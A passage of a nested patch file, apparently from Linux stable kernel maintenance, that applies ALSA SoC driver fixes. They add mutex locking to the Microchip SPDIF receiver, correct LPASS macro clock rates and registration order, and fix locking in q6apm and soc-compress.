++	u32 mr = 0;
+ 	int ret;
+ 
+ 	dev_dbg(dev->dev, "%s() rate=%u format=%#x width=%u channels=%u\n",
+@@ -413,13 +374,6 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-
+-	if (mr & SPDIFRX_MR_RXEN_ENABLE) {
+-		dev_err(dev->dev, "PCM already running\n");
+-		return -EBUSY;
+-	}
+-
+ 	if (params_channels(params) != SPDIFRX_CHANNELS) {
+ 		dev_err(dev->dev, "unsupported number of channels: %d\n",
+ 			params_channels(params));
+@@ -445,6 +399,13 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&dev->mlock);
++	if (dev->trigger_enabled) {
++		dev_err(dev->dev, "PCM already running\n");
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+@@ -455,19 +416,24 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		dev_err(dev->dev,
+ 			"unable to set gclk min rate: rate %u * ratio %u + 1\n",
+ 			params_rate(params), SPDIFRX_GCLK_RATIO_MIN);
+-		return ret;
++		goto unlock;
+ 	}
+ 	ret = clk_prepare_enable(dev->gclk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "unable to enable gclk: %d\n", ret);
+-		return ret;
++		goto unlock;
+ 	}
+ 	dev->gclk_enabled = 1;
+ 
+ 	dev_dbg(dev->dev, "GCLK range min set to %d\n",
+ 		params_rate(params) * SPDIFRX_GCLK_RATIO_MIN + 1);
+ 
+-	return regmap_write(dev->regmap, SPDIFRX_MR, mr);
++	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+@@ -475,10 +441,12 @@ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
++	mutex_lock(&dev->mlock);
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+ 	}
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -515,22 +483,51 @@ static int mchp_spdifrx_cs_get(struct mchp_spdifrx_dev *dev,
+ {
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_ch_stat *ch_stat = &ctrl->ch_stat[channel];
+-	int ret;
+-
+-	regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
+-	/* check for new data available */
+-	ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret < 0) {
+-		dev_dbg(dev->dev, "channel status for channel %d timeout\n",
+-			channel);
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To void waiting for completion and return with
++	 * timeout check the dev->trigger_enabled.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled CSC IRQ will update the data in software
++	 *   caches (ch_stat->data)
++	 * - otherwise we just update it here the software caches with latest
++	 *   available information and return it; in this case we don't need
++	 *   spin locking as the IRQ is disabled and will not be raised from
++	 *   anywhere else.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&ch_stat->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
++		/* Check for new data available */
++		ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "channel status for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(channel));
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with latest channel status. */
++		mchp_spdifrx_channel_status_read(dev, channel);
+ 	}
+ 
+ 	memcpy(uvalue->value.iec958.status, ch_stat->data,
+ 	       sizeof(ch_stat->data));
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_cs1_get(struct snd_kcontrol *kcontrol,
+@@ -564,29 +561,49 @@ static int mchp_spdifrx_subcode_ch_get(struct mchp_spdifrx_dev *dev,
+ 				       int channel,
+ 				       struct snd_ctl_elem_value *uvalue)
+ {
+-	unsigned long flags;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_user_data *user_data = &ctrl->user_data[channel];
+-	int ret;
+-
+-	reinit_completion(&user_data->done);
+-	mchp_spdifrx_isr_blockend_en(dev);
+-	ret = wait_for_completion_interruptible_timeout(&user_data->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret <= 0) {
+-		dev_dbg(dev->dev, "user data for channel %d timeout\n",
+-			channel);
+-		mchp_spdifrx_isr_blockend_dis(dev);
+-		return ret;
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To void waiting for completion to just timeout we
++	 * check here the dev->trigger_enabled flag.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled we need to wait for blockend IRQ to read
++	 *   data to and update it for us in software caches
++	 * - otherwise reading the SPDIFRX_CHUD() registers is enough.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&user_data->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
++		ret = wait_for_completion_interruptible_timeout(&user_data->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present. */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "user data for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with last available data. */
++		mchp_spdifrx_channel_user_data_read(dev, channel);
+ 	}
+ 
+-	spin_lock_irqsave(&user_data->lock, flags);
+ 	memcpy(uvalue->value.iec958.subcode, user_data->data,
+ 	       sizeof(user_data->data));
+-	spin_unlock_irqrestore(&user_data->lock, flags);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_subcode_ch1_get(struct snd_kcontrol *kcontrol,
+@@ -627,10 +644,24 @@ static int mchp_spdifrx_ulock_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool ulock_old = ctrl->ulock;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	} else {
++		ctrl->ulock = 0;
++	}
++
+ 	uvalue->value.integer.value[0] = ctrl->ulock;
+ 
++	mutex_unlock(&dev->mlock);
++
+ 	return ulock_old != ctrl->ulock;
+ }
+ 
+@@ -643,8 +674,22 @@ static int mchp_spdifrx_badf_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool badf_old = ctrl->badf;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	} else {
++		ctrl->badf = 0;
++	}
++
++	mutex_unlock(&dev->mlock);
++
+ 	uvalue->value.integer.value[0] = ctrl->badf;
+ 
+ 	return badf_old != ctrl->badf;
+@@ -656,11 +701,48 @@ static int mchp_spdifrx_signal_get(struct snd_kcontrol *kcontrol,
+ 	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 val;
++	u32 val = ~0U, loops = 10;
++	int ret;
+ 	bool signal_old = ctrl->signal;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * To get the signal we need to have receiver enabled. This
++	 * could be enabled also from trigger() function thus we need to
++	 * take care of not disabling the receiver when it runs.
++	 */
++	if (!dev->trigger_enabled) {
++		ret = clk_prepare_enable(dev->gclk);
++		if (ret)
++			goto unlock;
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++
++		/* Wait for RSR.ULOCK bit. */
++		while (--loops) {
++			regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++			if (!(val & SPDIFRX_RSR_ULOCK))
++				break;
++			usleep_range(100, 150);
++		}
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++
++		clk_disable_unprepare(dev->gclk);
++	} else {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++	}
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	if (!(val & SPDIFRX_RSR_ULOCK))
++		ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	else
++		ctrl->signal = 0;
+ 	uvalue->value.integer.value[0] = ctrl->signal;
+ 
+ 	return signal_old != ctrl->signal;
+@@ -685,18 +767,32 @@ static int mchp_spdifrx_rate_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	int rate;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-
+-	/* if the receiver is not locked, ISF data is invalid */
+-	if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		/* If the receiver is not locked, ISF data is invalid. */
++		if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++			ucontrol->value.integer.value[0] = 0;
++			goto unlock;
++		}
++	} else {
++		/* Reveicer is not locked, IFS data is invalid. */
+ 		ucontrol->value.integer.value[0] = 0;
+-		return 0;
++		goto unlock;
+ 	}
+ 
+ 	rate = clk_get_rate(dev->gclk);
+ 
+ 	ucontrol->value.integer.value[0] = rate / (32 * SPDIFRX_RSR_IFS(val));
+ 
++unlock:
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -808,11 +904,9 @@ static int mchp_spdifrx_dai_probe(struct snd_soc_dai *dai)
+ 		     SPDIFRX_MR_AUTORST_NOACTION |
+ 		     SPDIFRX_MR_PACK_DISABLED);
+ 
+-	dev->blockend_refcount = 0;
+ 	for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+ 		init_completion(&ctrl->ch_stat[ch].done);
+ 		init_completion(&ctrl->user_data[ch].done);
+-		spin_lock_init(&ctrl->user_data[ch].lock);
+ 	}
+ 
+ 	/* Add controls */
+@@ -827,7 +921,7 @@ static int mchp_spdifrx_dai_remove(struct snd_soc_dai *dai)
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
+ 	/* Disable interrupts */
+-	regmap_write(dev->regmap, SPDIFRX_IDR, 0xFF);
++	regmap_write(dev->regmap, SPDIFRX_IDR, GENMASK(14, 0));
+ 
+ 	clk_disable_unprepare(dev->pclk);
+ 
+@@ -913,7 +1007,17 @@ static int mchp_spdifrx_probe(struct platform_device *pdev)
+ 			"failed to get the PMC generated clock: %d\n", err);
+ 		return err;
+ 	}
+-	spin_lock_init(&dev->blockend_lock);
++
++	/*
++	 * Signal control need a valid rate on gclk. hw_params() configures
++	 * it propertly but requesting signal before any hw_params() has been
++	 * called lead to invalid value returned for signal. Thus, configure
++	 * gclk at a valid rate, here, in initialization, to simplify the
++	 * control path.
++	 */
++	clk_set_min_rate(dev->gclk, 48000 * SPDIFRX_GCLK_RATIO_MIN + 1);
++
++	mutex_init(&dev->mlock);
+ 
+ 	dev->dev = &pdev->dev;
+ 	dev->regmap = regmap;
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index a9ef9d5ffcc5c..8621cfabcf5b6 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -366,7 +366,7 @@
+ #define CDC_RX_DSD1_CFG2			(0x0F8C)
+ #define RX_MAX_OFFSET				(0x0F8C)
+ 
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ #define RX_MACRO_RATES (SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000 |\
+ 			SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_48000 |\
+@@ -3579,7 +3579,7 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(rx->mclk, MCLK_FREQ);
+-	clk_set_rate(rx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(rx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(rx->macro);
+ 	if (ret)
+@@ -3601,10 +3601,6 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = rx_macro_register_mclk_output(rx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &rx_macro_component_drv,
+ 					      rx_macro_dai,
+ 					      ARRAY_SIZE(rx_macro_dai));
+@@ -3618,6 +3614,10 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = rx_macro_register_mclk_output(rx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index ee15cf6b98bba..5d1c58df081ac 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -202,7 +202,7 @@
+ #define TX_MACRO_AMIC_UNMUTE_DELAY_MS	100
+ #define TX_MACRO_DMIC_HPF_DELAY_MS	300
+ #define TX_MACRO_AMIC_HPF_DELAY_MS	300
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ enum {
+ 	TX_MACRO_AIF_INVALID = 0,
+@@ -1867,7 +1867,7 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+-	clk_set_rate(tx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(tx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(tx->macro);
+ 	if (ret)
+@@ -1889,10 +1889,6 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = tx_macro_register_mclk_output(tx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &tx_macro_component_drv,
+ 					      tx_macro_dai,
+ 					      ARRAY_SIZE(tx_macro_dai));
+@@ -1905,6 +1901,10 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = tx_macro_register_mclk_output(tx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-va-macro.c b/sound/soc/codecs/lpass-va-macro.c
+index b0b6cf29cba30..1623ba78ddb3d 100644
+--- a/sound/soc/codecs/lpass-va-macro.c
++++ b/sound/soc/codecs/lpass-va-macro.c
+@@ -1524,16 +1524,6 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_mclk;
+ 
+-	ret = va_macro_register_fsgen_output(va);
+-	if (ret)
+-		goto err_clkout;
+-
+-	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
+-	if (IS_ERR(va->fsgen)) {
+-		ret = PTR_ERR(va->fsgen);
+-		goto err_clkout;
+-	}
+-
+ 	if (va->has_swr_master) {
+ 		/* Set default CLK div to 1 */
+ 		regmap_update_bits(va->regmap, CDC_VA_TOP_CSR_SWR_MIC_CTL0,
+@@ -1560,6 +1550,16 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = va_macro_register_fsgen_output(va);
++	if (ret)
++		goto err_clkout;
++
++	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
++	if (IS_ERR(va->fsgen)) {
++		ret = PTR_ERR(va->fsgen);
++		goto err_clkout;
++	}
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 5e0abefe7cced..c012033fb69ed 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2449,11 +2449,6 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = wsa_macro_register_mclk_output(wsa);
+-	if (ret)
+-		goto err_clkout;
+-
+-
+ 	ret = devm_snd_soc_register_component(dev, &wsa_macro_component_drv,
+ 					      wsa_macro_dai,
+ 					      ARRAY_SIZE(wsa_macro_dai));
+@@ -2466,6 +2461,10 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = wsa_macro_register_mclk_output(wsa);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/tlv320adcx140.c b/sound/soc/codecs/tlv320adcx140.c
+index 91a22d9279158..530f321d08e9c 100644
+--- a/sound/soc/codecs/tlv320adcx140.c
++++ b/sound/soc/codecs/tlv320adcx140.c
+@@ -925,7 +925,7 @@ static int adcx140_configure_gpio(struct adcx140_priv *adcx140)
+ 
+ 	gpio_count = device_property_count_u32(adcx140->dev,
+ 			"ti,gpio-config");
+-	if (gpio_count == 0)
++	if (gpio_count <= 0)
+ 		return 0;
+ 
+ 	if (gpio_count != ADCX140_NUM_GPIO_CFGS)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 8205b32171495..df7c0bf372451 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -281,6 +281,7 @@ static int fsl_sai_set_dai_fmt_tr(struct snd_soc_dai *cpu_dai,
+ 		val_cr4 |= FSL_SAI_CR4_MF;
+ 
+ 	sai->is_pdm_mode = false;
++	sai->is_dsp_mode = false;
+ 	/* DAI mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_I2S:
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 700a18561a940..640cebd2983e2 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -86,7 +86,7 @@ kirkwood_dma_conf_mbus_windows(void __iomem *base, int win,
+ 
+ 	/* try to find matching cs for current dma address */
+ 	for (i = 0; i < dram->num_cs; i++) {
+-		const struct mbus_dram_window *cs = dram->cs + i;
++		const struct mbus_dram_window *cs = &dram->cs[i];
+ 		if ((cs->base & 0xffff0000) < (dma & 0xffff0000)) {
+ 			writel(cs->base & 0xffff0000,
+ 				base + KIRKWOOD_AUDIO_WIN_BASE_REG(win));
+diff --git a/sound/soc/qcom/qdsp6/q6apm-dai.c b/sound/soc/qcom/qdsp6/q6apm-dai.c
+index ee59ef36b85a6..7f02f5b2c33fd 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-dai.c
++++ b/sound/soc/qcom/qdsp6/q6apm-dai.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
++#include <linux/spinlock.h>
+ #include <sound/pcm.h>
+ #include <asm/dma.h>
+ #include <linux/dma-mapping.h>
+@@ -53,6 +54,7 @@ struct q6apm_dai_rtd {
+ 	uint16_t session_id;
+ 	enum stream_state state;
+ 	struct q6apm_graph *graph;
++	spinlock_t lock;
+ };
+ 
+ struct q6apm_dai_data {
+@@ -62,7 +64,8 @@ struct q6apm_dai_data {
+ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_48000,
+ 	.rate_min =             8000,
+@@ -80,7 +83,8 @@ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ static struct snd_pcm_hardware q6apm_dai_hardware_playback = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_192000,
+ 	.rate_min =             8000,
+@@ -99,20 +103,25 @@ static void event_handler(uint32_t opcode, uint32_t token, uint32_t *payload, vo
+ {
+ 	struct q6apm_dai_rtd *prtd = priv;
+ 	struct snd_pcm_substream *substream = prtd->substream;
++	unsigned long flags;
+ 
+ 	switch (opcode) {
+ 	case APM_CLIENT_EVENT_CMD_EOS_DONE:
+ 		prtd->state = Q6APM_STREAM_STOPPED;
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_WRITE_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_write_async(prtd->graph, prtd->pcm_count, 0, 0, 0);
+ 
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_READ_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_read(prtd->graph);
+@@ -253,6 +262,7 @@ static int q6apm_dai_open(struct snd_soc_component *component,
+ 	if (prtd == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock_init(&prtd->lock);
+ 	prtd->substream = substream;
+ 	prtd->graph = q6apm_graph_open(dev, (q6apm_cb)event_handler, prtd, graph_id);
+ 	if (IS_ERR(prtd->graph)) {
+@@ -332,11 +342,17 @@ static snd_pcm_uframes_t q6apm_dai_pointer(struct snd_soc_component *component,
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct q6apm_dai_rtd *prtd = runtime->private_data;
++	snd_pcm_uframes_t ptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&prtd->lock, flags);
+ 	if (prtd->pos == prtd->pcm_size)
+ 		prtd->pos = 0;
+ 
+-	return bytes_to_frames(runtime, prtd->pos);
++	ptr =  bytes_to_frames(runtime, prtd->pos);
++	spin_unlock_irqrestore(&prtd->lock, flags);
++
++	return ptr;
+ }
+ 
+ static int q6apm_dai_hw_params(struct snd_soc_component *component,
+diff --git a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+index ce9e5646d8f3a..23d23bc6fbaa7 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
++++ b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+@@ -127,6 +127,11 @@ static int q6apm_lpass_dai_prepare(struct snd_pcm_substream *substream, struct s
+ 	int graph_id = dai->id;
+ 	int rc;
+ 
++	if (dai_data->is_port_started[dai->id]) {
++		q6apm_graph_stop(dai_data->graph[dai->id]);
++		dai_data->is_port_started[dai->id] = false;
++	}
++
+ 	/**
+ 	 * It is recommend to load DSP with source graph first and then sink
+ 	 * graph, so sequence for playback and capture will be different
+diff --git a/sound/soc/sh/rcar/rsnd.h b/sound/soc/sh/rcar/rsnd.h
+index d9cd190d7e198..f8ef6836ef84e 100644
+--- a/sound/soc/sh/rcar/rsnd.h
++++ b/sound/soc/sh/rcar/rsnd.h
+@@ -901,8 +901,6 @@ void rsnd_mod_make_sure(struct rsnd_mod *mod, enum rsnd_mod_type type);
+ 	if (!IS_BUILTIN(RSND_DEBUG_NO_DAI_CALL))	\
+ 		dev_dbg(dev, param)
+ 
+-#endif
+-
+ #ifdef CONFIG_DEBUG_FS
+ int rsnd_debugfs_probe(struct snd_soc_component *component);
+ void rsnd_debugfs_reg_show(struct seq_file *m, phys_addr_t _addr,
+@@ -913,3 +911,5 @@ void rsnd_debugfs_mod_reg_show(struct seq_file *m, struct rsnd_mod *mod,
+ #else
+ #define rsnd_debugfs_probe  NULL
+ #endif
++
++#endif /* RSND_H */
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index 870f13e1d389c..e7aa6f360cabe 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -149,6 +149,8 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	if (ret < 0)
+ 		goto be_err;
+ 
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
++
+ 	/* calculate valid and active FE <-> BE dpcms */
+ 	dpcm_process_paths(fe, stream, &list, 1);
+ 	fe->dpcm[stream].runtime = fe_substream->runtime;
+@@ -184,7 +186,6 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_OPEN;
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_NO;
+ 
+-	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_activate(fe, stream);
+ 	mutex_unlock(&fe->card->pcm_mutex);
+ 
+@@ -215,7 +216,6 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_deactivate(fe, stream);
+-	mutex_unlock(&fe->card->pcm_mutex);
+ 
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_FE;
+ 
+@@ -234,6 +234,8 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	dpcm_be_disconnect(fe, stream);
+ 
++	mutex_unlock(&fe->card->pcm_mutex);
++
+ 	fe->dpcm[stream].runtime = NULL;
+ 
+ 	snd_soc_link_compr_shutdown(cstream, 0);
+@@ -409,8 +411,9 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
+ 	ret = snd_soc_link_compr_set_params(cstream);
+ 	if (ret < 0)
+ 		goto out;
+-
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	dpcm_dapm_stream_event(fe, stream, SND_SOC_DAPM_STREAM_START);
++	mutex_unlock(&fe->card->pcm_mutex);
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_PREPARE;
+ 
+ out:
+@@ -623,7 +626,7 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
